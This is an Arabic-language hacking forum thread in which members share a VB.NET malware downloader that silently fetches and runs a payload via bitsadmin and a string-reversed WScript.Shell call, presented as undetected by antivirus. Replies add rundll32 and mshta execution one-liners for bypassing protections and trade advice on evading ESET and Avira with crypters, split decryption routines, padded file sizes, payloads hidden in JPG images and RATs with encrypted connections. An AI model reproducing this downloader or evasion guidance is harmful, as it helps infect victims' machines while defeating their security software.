المشاركات اخر المواضيع الاكثر مشاهدة

En çok mesaj

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
السلام عليكم شباب

لقد كتبت كود Downloader منذ فتره ولم ينكشف قلت اطرحه لكم يمكن يستفيد منه اي شخص

Scan :

Code :

Module MAIN

Sub main()
d(url, path, filename)
p(path, filename)
End Sub
Function d(ByVal url As String, ByVal path As String, ByVal filename As String)
Try
CreateObject(StrReverse("llehS.tpircSW")).run("bitsadmin.exe /transfer 8 " & url & " " & path & "\" & filename, 0, True)
Catch ex As Exception
End Try
End Function

Function p(ByVal path As String, ByVal filename As String)
Try
CreateObject(StrReverse("llehS.tpircSW")).Run(path & "\" & filename)
Catch ex As Exception
End Try
End Function
Public url As String = "http://127.0.0.1/payload.exe"
Public path As String = "%TEMP%"
Public filename As String = "TEST.exe"
End Module​
 

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
نادراً اشوف احد يستخدم bitsadmin.exe بكل امانة من زمان ما شفتها في المجال هذا
اغلب الاستخدام في الpentesting و هذا شي جميل جداً , بارك الله فيك اخي العزيز
 

دكتور ويب

Beginner Hacker
إنضم
8 ديسمبر 2020
المشاركات
58
مستوى التفاعل
34
النقاط
18
العمر
31
نظام التشغيل
windows_xp
Clean Downloader VB.NET
شكرا يابطل في انتظار برمجه اخري
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
حسب وجهة نظري Downloader لا يعتمد عليه في الاختراق بسبب مواقع الرفع لانها ستحدف السيرفر
او تتوقف و يدهب التبليغ
اصبحت الحمايات شرسة للغاية و خاصة في الاشهر الاخيرة و ربما هي كذلك تتابع مواضيع التشفير هههههه
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
نادراً اشوف احد يستخدم bitsadmin.exe بكل امانة من زمان ما شفتها في المجال هذا
اغلب الاستخدام في الpentesting و هذا شي جميل جداً , بارك الله فيك اخي العزيز
شكرا اخي هيا فكره بسيطه وسهله هناك الكثير من الاشخاص يحتاجونها 🥰
 
  • اعجبني
التفاعلات: Story

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
حسب وجهة نظري Downloader لا يعتمد عليه في الاختراق بسبب مواقع الرفع لانها ستحدف السيرفر
او تتوقف و يدهب التبليغ
اصبحت الحمايات شرسة للغاية و خاصة في الاشهر الاخيرة و ربما هي كذلك تتابع مواضيع التشفير هههههه
هناك من يستعملون استضافات مدفوعه, بلنسبه لمواقع الرافع فانا احاول استغلال فكره اخفاء ملفات في صوره jpg مثلا هناك ملاين المواقع لرفع الصور بروابط مباشره ودائمه تقريبا ثم يتم تحميل الصوره واستخراج البايت المخزن بها ثم تشغيلها

سبب تطور الحمايات وهيا التشفير بلطرق القديمه و نقاط الادخال مافي تطوير في التشفير , افضل حل هوه تشفير الاكواد نفسها تغير في شكل الكود تقسيمها علي مكاتب في شكل ملفات dll ثم استدعئها هناك ملاين الافكار للتمويه وتبديل الاكود باكواد اخري تقوم بنفس الغرض حتي يصبح الناتج جديد علي الحمايات
 

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
Clean Downloader VB.NET
داونلودر بتقنية مميزة احسنت التطوير اخي
بالنسبة لتشغيل الملف يمكنك التنويع و استخدام Rundll بهذه الطريقة فتتخطى بعض الحمايات
Bash:
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
قلت اضيفها ربما هناك من لا يعرفها
هناك استخدامات اخرى كثيرة مثلا تشغيل كود vbs
Bash:
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('Hello')","vbs");window.close()
الكود سيقوم بتشغيل MessageBox يحتوي النص Hello
 

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
داونلودر بتقنية مميزة احسنت التطوير اخي
بالنسبة لتشغيل الملف يمكنك التنويع و استخدام Rundll بهذه الطريقة فتتخطى بعض الحمايات
Bash:
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
قلت اضيفها ربما هناك من لا يعرفها
هناك استخدامات اخرى كثيرة مثلا تشغيل كود vbs
Bash:
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('Hello')","vbs");window.close()
الكود سيقوم بتشغيل MessageBox يحتوي النص Hello
بصراحة هذه كمان على 2017 - 2018 اخي @titanium لكن اتحدى اي اثنين يعرفوها
جازاك الله خير لمشاركتها اخي العزيز رجعت لي الحنين للماضي 😂
احتمال انزل موضوع طريقة تلغيم اليوم هي قديمة جداً لكن سهلة و ذات مفعول مؤثر فعلياً على الواقع
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
بصراحة هذه كمان على 2017 - 2018 اخي @titanium لكن اتحدى اي اثنين يعرفوها
جازاك الله خير لمشاركتها اخي العزيز رجعت لي الحنين للماضي 😂
احتمال انزل موضوع طريقة تلغيم اليوم هي قديمة جداً لكن سهلة و ذات مفعول مؤثر فعلياً على الواقع
انت نزل طريقة للتلغيم و ان سوف انزل طريقة تشفير الهوست لانجرات 7 لكنها فكرة قديمه هههه
 
  • احببته
التفاعلات: Story

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
هناك من يستعملون استضافات مدفوعه, بلنسبه لمواقع الرافع فانا احاول استغلال فكره اخفاء ملفات في صوره jpg مثلا هناك ملاين المواقع لرفع الصور بروابط مباشره ودائمه تقريبا ثم يتم تحميل الصوره واستخراج البايت المخزن بها ثم تشغيلها

سبب تطور الحمايات وهيا التشفير بلطرق القديمه و نقاط الادخال مافي تطوير في التشفير , افضل حل هوه تشفير الاكواد نفسها تغير في شكل الكود تقسيمها علي مكاتب في شكل ملفات dll ثم استدعئها هناك ملاين الافكار للتمويه وتبديل الاكود باكواد اخري تقوم بنفس الغرض حتي يصبح الناتج جديد علي الحمايات
لا يوجد افضل من برامج التشفير المدفوعة هههه
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
داونلودر بتقنية مميزة احسنت التطوير اخي
بالنسبة لتشغيل الملف يمكنك التنويع و استخدام Rundll بهذه الطريقة فتتخطى بعض الحمايات
Bash:
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
قلت اضيفها ربما هناك من لا يعرفها
هناك استخدامات اخرى كثيرة مثلا تشغيل كود vbs
Bash:
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('Hello')","vbs");window.close()
الكود سيقوم بتشغيل MessageBox يحتوي النص Hello
لقد وصلت الي مرحلة متقدمة لاعادة تشفير برنامج KazyCrypter انطلاقا من السورس المطروح من طرفك
و لم يبقي الي النود و الافيرا و بسببهما كرهت التشفير هههه
فيديو
 

titanium

Plus Hacker
إنضم
15 يوليو 2019
المشاركات
317
مستوى التفاعل
410
النقاط
63
العمر
31
Clean Downloader VB.NET
لقد وصلت الي مرحلة متقدمة لاعادة تشفير برنامج KazyCrypter انطلاقا من السورس المطروح من طرفك
و لم يبقي الي النود و الافيرا و بسببهما كرهت التشفير هههه
فيديو
نتيجة ممتازة اخي سام
حسب تجربتي مع النود
القيمة Kryptic التي كشفها النود خاصة بنقطة الادخال عليك تشفيرها
اما عندما تستخدم الرانبي يكشفه بالقيمة Injector
الافيرا في كثير من المرات يكشف دوال فك التشفير بالاخص عندما استخدم AESDecrypt
الحل كان بتقسيم الاكواد على كلاسات وضع دالة الفك في AboutForm
ايضا جرب زيادة حجم السرفر PUMP لاكثر من 2 ميجا
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
نتيجة ممتازة اخي سام
حسب تجربتي مع النود
القيمة Kryptic التي كشفها النود خاصة بنقطة الادخال عليك تشفيرها
اما عندما تستخدم الرانبي يكشفه بالقيمة Injector
الافيرا في كثير من المرات يكشف دوال فك التشفير بالاخص عندما استخدم AESDecrypt
الحل كان بتقسيم الاكواد على كلاسات وضع دالة الفك في AboutForm
ايضا جرب زيادة حجم السرفر PUMP لاكثر من 2 ميجا
نعم اخي سوف اتبع نصائحك و اقوم بتشفير نقطة الادخال
السورس معقد نوعا ما و زد علي ذلك فهو بالسي شارب هههه
لقد حدفت منه امور كثيرة و من بينها البرنامج المساعد المدموج داخله Confuser
سوف احاول ارجاعه كلين دون استعمال برامج مساعدة
لو نجح معي الامر سوف اطرحه هنا في المنتدي حتي يستفيد منه الاعضاء و ربما اكون في يوم من الايام
من بين ضحاياهم هههه
 

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
انت نزل طريقة للتلغيم و ان سوف انزل طريقة تشفير الهوست لانجرات 7 لكنها فكرة قديمه هههه
ان شاء الله خلال دقائق من الان
لاني فاضي هذه الساعة
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
داونلودر بتقنية مميزة احسنت التطوير اخي
بالنسبة لتشغيل الملف يمكنك التنويع و استخدام Rundll بهذه الطريقة فتتخطى بعض الحمايات
Bash:
rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
قلت اضيفها ربما هناك من لا يعرفها
هناك استخدامات اخرى كثيرة مثلا تشغيل كود vbs
Bash:
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('Hello')","vbs");window.close()
الكود سيقوم بتشغيل MessageBox يحتوي النص Hello
ممتاز اخي او ممكن ايضا
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd.exe"", 0:close")
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
لا يوجد افضل من برامج التشفير المدفوعة هههه
هذا الكلام كان زمان اخي كل انواع التشفير الان تعتمد علي نقاط اداخال وتشغيل في الذاكره مافي اعاده تشفير السورس نفسه , هناك الكثير من الاشخاص تركوا هذا المجال بسبب اعتمادهم علي الطرق القديم والخورزميات القديمه سوف تلاحظ القليل في هذا المجال الان
( الحل الوحيد وهوه التشفير برمجيا ) او انتاج برنامج RAT خاص بك بسوكت اتصال مشفر ونظيف وسوف تلاحظ انا تشفيره اصبح سهل الحل في الاخير وهوه تعلم البرمجه واخذ فكره عن الاتصال خارج الشبكه وكيفيه تشفيره وحاول تنسي الطرق القديمه لانك سوف تتعب معها ولن تصل لشيئ وشكرا
 

SAMPOP

V • I • P
إنضم
9 سبتمبر 2018
المشاركات
1,634
مستوى التفاعل
2,013
النقاط
113
العمر
21
Clean Downloader VB.NET
هذا الكلام كان زمان اخي كل انواع التشفير الان تعتمد علي نقاط اداخال وتشغيل في الذاكره مافي اعاده تشفير السورس نفسه , هناك الكثير من الاشخاص تركوا هذا المجال بسبب اعتمادهم علي الطرق القديم والخورزميات القديمه سوف تلاحظ القليل في هذا المجال الان
( الحل الوحيد وهوه التشفير برمجيا ) او انتاج برنامج RAT خاص بك بسوكت اتصال مشفر ونظيف وسوف تلاحظ انا تشفيره اصبح سهل الحل في الاخير وهوه تعلم البرمجه واخذ فكره عن الاتصال خارج الشبكه وكيفيه تشفيره وحاول تنسي الطرق القديمه لانك سوف تتعب معها ولن تصل لشيئ وشكرا
انا لا اشفر من اجلي بل اشفر من اجل الاعضاء
و كذلك حتي لو برمجت برنامج اختراق جديد فسوف اشاركه مع الكل و سوف يصبح مكشوف
و عندما يكون برنامج تشفير مدفوع فسوف يقوم صاحبه بتحديثه و اعادة تشفيره من داخل السورس
هذا ما كنت اقصد باعادة تشفيره اما في ما يخص الابتعاد عن الطرق التقليدية في التشفير
فهذا مستحيل لانه لا توجد طرق حديثة فكل التشفيرات مبنية علي التلاعب و تمويه الاكواد
و حتي لو انت شفرت بالطرق الحديثة فمصيرها الكشف من طرف الحمايات
مجرد وجهة نظر فقط
 

Evil Coder

Beginner Hacker
إنضم
3 يونيو 2020
المشاركات
230
مستوى التفاعل
284
النقاط
63
نظام التشغيل
windows_10
Clean Downloader VB.NET
انا لا اشفر من اجلي بل اشفر من اجل الاعضاء
و كذلك حتي لو برمجت برنامج اختراق جديد فسوف اشاركه مع الكل و سوف يصبح مكشوف
و عندما يكون برنامج تشفير مدفوع فسوف يقوم صاحبه بتحديثه و اعادة تشفيره من داخل السورس
هذا ما كنت اقصد باعادة تشفيره اما في ما يخص الابتعاد عن الطرق التقليدية في التشفير
فهذا مستحيل لانه لا توجد طرق حديثة فكل التشفيرات مبنية علي التلاعب و تمويه الاكواد
و حتي لو انت شفرت بالطرق الحديثة فمصيرها الكشف من طرف الحمايات
مجرد وجهة نظر فقط
نعم معك , لو صنعت رات جيد باتصال مشفر وقللت الاكواد داخل Stub وصعنت Plugins جديده فقط ضع الاشياء الاساسيه فقط علي الاقلل سوف ينكشف بعد مده كبيره جدا وسوف تلاحظ كلامي عن تجراب - يعني بلنسبه للخورزميات يمكنك التعديل علي الفكشن الخاص بها والتغير في شكل ناتج الخورزميه ونقاط الاداخال قم بتقسمها علي مجموعه من الكلاسات او ضيفها في مكتبه خارجيه وايضا قم بتفسيمها علي كلاسات في المكتبه
وبلتوفيق اخي سامبوب 🥰
 

Story

Plus Hacker
إنضم
25 مارس 2019
المشاركات
280
مستوى التفاعل
383
النقاط
63
Clean Downloader VB.NET
سوكت اتصال مشفر ونظيف
ممكن توضح هذه النقطة ؟؟
السوكت سوكت حتى لو كان بأبسط طريقة تتخيلها
الي يفرق معاك شي واحد البيانات المرسلة و المستلمة

هي العلة لان برمجيات الحماية تعترض packets و تحللها


اتمنى توضحلي الكلام حتى اتعلم منك اخي
 

مواضيع مماثلة

أعلى